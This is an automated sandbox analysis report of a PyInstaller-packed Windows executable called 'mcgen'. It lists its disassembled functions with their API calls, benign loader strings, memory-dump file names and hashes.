Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 6F02B5A0A0DB1791FE259F7EA8605B423ADAF057B7F544035DB1EC3260EF3CB5588262

Function 00007FF6B9F181C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B9F19400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B9F145E4,00000000,00007FF6B9F11985), ref: 00007FF6B9F19439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6B9F188A7,?,?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F1821C

Part of subcall function 00007FF6B9F12810: MessageBoxW.USER32 ref: 00007FF6B9F128EA

Strings

LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6B9F18363
\, xrefs: 00007FF6B9F18251
%.*s, xrefs: 00007FF6B9F182FC
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6B9F182C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6B9F181F3
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6B9F18230
CreateDirectory, xrefs: 00007FF6B9F1836C
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6B9F1828D

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: 386707338cad5ae1fbee884ed00956b28f4333bfd88fda9d00634326c69211f4
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: D851CB51B1C6A241FB619F3DE9512B92258EF967A2F444031EB0EC36D5EE3CE005C790

Function 00007FF6B9F12180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6B9F121AB
SelectObject.GDI32 ref: 00007FF6B9F121F2
DrawTextW.USER32 ref: 00007FF6B9F12215
SelectObject.GDI32 ref: 00007FF6B9F1222B
ReleaseDC.USER32 ref: 00007FF6B9F1223B
MoveWindow.USER32 ref: 00007FF6B9F1228B
MoveWindow.USER32 ref: 00007FF6B9F122CB
MoveWindow.USER32 ref: 00007FF6B9F1231E
MoveWindow.USER32 ref: 00007FF6B9F12366

Strings

P%, xrefs: 00007FF6B9F121FF

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: e541e2d943aefbfa98d8323facf1c8f315f038368c757b2f0be2f9395589beef
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: CD51E866608BA186D6349F36E4581BAB7A1F798BA2F004135EFDE83794DF3CD085DB10

Function 00007FF6B9F180B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6B9F180EF
GetWindowLongPtrW.USER32 ref: 00007FF6B9F1816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6B9F18182
GetLastError.KERNEL32 ref: 00007FF6B9F1818C
SetWindowLongPtrW.USER32 ref: 00007FF6B9F181A3

Strings

Needs to remove its temporary files., xrefs: 00007FF6B9F18175

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: e6ad37a2b96932608e2bb081b681cf2f9c53eda15366a0dac0eb93e3d8f27e84
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 07217162B0CA5282E7558F7EA9641796258EF89BF3F584131DB2DC33A4DE2CD5908211

Function 00007FF6B9F26300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F26343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F26730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F269CC

Strings

p, xrefs: 00007FF6B9F263F5
-, xrefs: 00007FF6B9F263D9
:, xrefs: 00007FF6B9F264FC
f, xrefs: 00007FF6B9F26465
p, xrefs: 00007FF6B9F2646D

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 2c70acacee153bd8be5aa881f136da5d21ce04e6ed57b5f12a3a1c18e6f142ab
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: B6126E62E0D1C386FB245E99A1543B97699FB40766F944137F79A8B6C4DF3CE9808B00

Function 00007FF6B9F21038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F21078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F21440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F216DF

Strings

f, xrefs: 00007FF6B9F212C5
f, xrefs: 00007FF6B9F2117A
f, xrefs: 00007FF6B9F21110
p, xrefs: 00007FF6B9F2111D
p, xrefs: 00007FF6B9F21182

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 28db7993bf3520b09925e22a9528af36d3ac3e9e8a3f048d83e4c5687f741529
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: AA126221F0C1C385FB209E59A05477A766AFB8176AF988135F799C75C4DF7DE8808B08

Function 00007FF6B9F11050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6B9F110CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6B9F111F6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6B9F11098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6B9F11108
fseek, xrefs: 00007FF6B9F110D3
malloc, xrefs: 00007FF6B9F1110F
fread, xrefs: 00007FF6B9F111FD

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 4cc54575f44bf6f2f4858099a4d2ef854ab704aef2a59d680940986a275edb76
Instruction ID: 7b599659ce1b3c64d7a9073704529e44ca86019039f0955f4993c50dfd151c4c
Opcode Fuzzy Hash: 4cc54575f44bf6f2f4858099a4d2ef854ab704aef2a59d680940986a275edb76
Instruction Fuzzy Hash: BE419661B1C6B242EA14DF29A8106B9A39CFF45BE6F548531EF0D97795DE3CE1018780

Function 00007FF6B9F11470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6B9F114DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6B9F115DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6B9F1149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6B9F11518
fseek, xrefs: 00007FF6B9F114E5
malloc, xrefs: 00007FF6B9F1151F
fread, xrefs: 00007FF6B9F115E6

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: d29ee8b892decec41a2eef625e99541147c5159d7bb399182ff555fbc9cd6221
Instruction ID: 8be978f6cd17b13e4ce43d89b2732511896161ea4acae3bd1ea3e97f422f7712
Opcode Fuzzy Hash: d29ee8b892decec41a2eef625e99541147c5159d7bb399182ff555fbc9cd6221
Instruction Fuzzy Hash: 9241A362B086A286EB10DF3994102B97398FF457A6F848532EF0D87B95DF3CE502C745

Function 00007FF6B9F1EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6B9F1EAD5

Part of subcall function 00007FF6B9F1FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF6B9F1FA6F
Part of subcall function 00007FF6B9F1FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6B9F1FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6B9F1EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6B9F1EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6B9F1EF08

Strings

csm, xrefs: 00007FF6B9F1EB56
csm, xrefs: 00007FF6B9F1EAEF
csm, xrefs: 00007FF6B9F1EBD0

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 9ec519fcebbf1881a87c8b349615565c5e593715a0bbd5a59b928582f167b132
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 36D17DB2A0877186EB20DF2994403AD7BA9FB567A9F100135EF4D97B95DF38E480C780

Function 00007FF6B9F12C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12D63
MessageBoxW.USER32 ref: 00007FF6B9F12D99

Strings

%ls: , xrefs: 00007FF6B9F12D22
[PYI-%d:ERROR] , xrefs: 00007FF6B9F12CA6
<FormatMessageW failed.>, xrefs: 00007FF6B9F12D70
Error, xrefs: 00007FF6B9F12D8C

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 210438946354a18f8fbe362e5ec87bf74fe9d8437b7abca0984244b5ccc5fd6b
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: C331E562B08A6142E6209F69B8102FA7799BF897EAF400136EF4DD3799DF3CD506C340

Function 00007FF6B9F1DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DDBD
GetLastError.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DE63
GetProcAddress.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DE6F

Strings

api-ms-, xrefs: 00007FF6B9F1DDDD

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 45193643e34a6f57ec8a05fac5115b39864309d1f9f10769b84b6313b6cfb376
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 1031C6A1B1A66291EE21DF1AA80057523ACFF59BB3F4A4535EF1D87394DF3CE4448360

Function 00007FF6B9F16350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6B9F163B7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6B9F16446
LoadLibrary, xrefs: 00007FF6B9F1649E
ucrtbase.dll, xrefs: 00007FF6B9F163CD
Failed to load Python DLL '%ls'., xrefs: 00007FF6B9F16497
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6B9F163F7

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: 97204bd2ee85d3d6ad1084c1e85c0ccb472648f685519b5a01a069e9fe06400d
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 6E41B6B1B0C6A791EA21DF68E4142E96319FF453A6F900132DB5C83295EF3CE505C780

Function 00007FF6B9F12A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B9F1351A,?,00000000,00007FF6B9F13F23), ref: 00007FF6B9F12AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF6B9F12B0F
0, xrefs: 00007FF6B9F12B16
[PYI-%d:%s] , xrefs: 00007FF6B9F12AA8
Warning, xrefs: 00007FF6B9F12B1E
WARNING, xrefs: 00007FF6B9F12AAF

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 5156faef99e6268b941c9bc9359db9440201f0fa57396ee7d78b85c7e725cfde
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 5A217C72A18B9182E7209F69B8817E67398FB897E6F400136FF8C93659DF3CD2458740

Function 00007FF6B9F2B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6B9F2B1CF
FlsGetValue.KERNEL32 ref: 00007FF6B9F2B1E4
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B205
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B232
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B243
FlsSetValue.KERNEL32 ref: 00007FF6B9F2B254
SetLastError.KERNEL32 ref: 00007FF6B9F2B26F

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: 7702993e72f95e550cb08bb26b5e8cdc23441132250278a9c96e302489e53273
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: F1211620A0C28642FA69AB7A665123D715A9F857F3F144638FA3E87AD6DE3CA4418701

Function 00007FF6B9F37DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6B9F37E0D
GetLastError.KERNEL32 ref: 00007FF6B9F37E19
CloseHandle.KERNEL32 ref: 00007FF6B9F37E31
CreateFileW.KERNEL32 ref: 00007FF6B9F37E5C
WriteConsoleW.KERNEL32 ref: 00007FF6B9F37E7B

Strings

CONOUT$, xrefs: 00007FF6B9F37E3D

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: dc262087f25c4bf892e7eb016f60f48cf466c1f39989985dafa0d778ffa4ef59
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: B7117F21A18A4186E7609F6AA85433966A8BB88BF6F000234EB5DC77A4DF7CD9448B41

Function 00007FF6B9F18560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F18592
